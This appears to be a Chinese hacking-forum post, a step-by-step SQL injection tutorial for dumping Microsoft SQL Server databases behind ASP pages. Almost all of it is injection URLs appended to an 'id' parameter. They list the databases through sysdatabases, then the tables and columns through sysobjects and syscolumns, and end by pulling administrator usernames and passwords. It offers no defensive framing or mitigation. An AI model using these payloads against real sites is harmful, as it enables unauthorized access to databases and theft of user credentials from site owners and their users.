马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?注册
×
SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般步骤,希望能对你有帮助。
1:暴出所有库名.
http://www.***.com/***.asp?id=1 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) ,依次提交 dbid = 7,8,9.... 得到更多的数据库名 。
2:暴出库中的表
假设存在一个bbs的数据库,提交下面的语句:
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') ,来得到一个表 假设为 admin
提交:
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in
('Admin')) ,来得到其他的表。
3:暴出表中的字段
提交:
http://www.***.com/***.asp?id=1 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) ,得到UID的数值假设为18779569 uid=id
提交:
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) ,得到一个admin的一个字段,假设为 user_id
提交:
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...)) ,来暴出其他的字段
4:暴出用户名和密码等
假设存在user_id username ,password 等字段,提交:
http://www.***.com/***.asp?id=1 and 0<(select user_id from BBS.dbo.admin where username>1)
可以得到用户名
依次可以得到密码。。。。。 |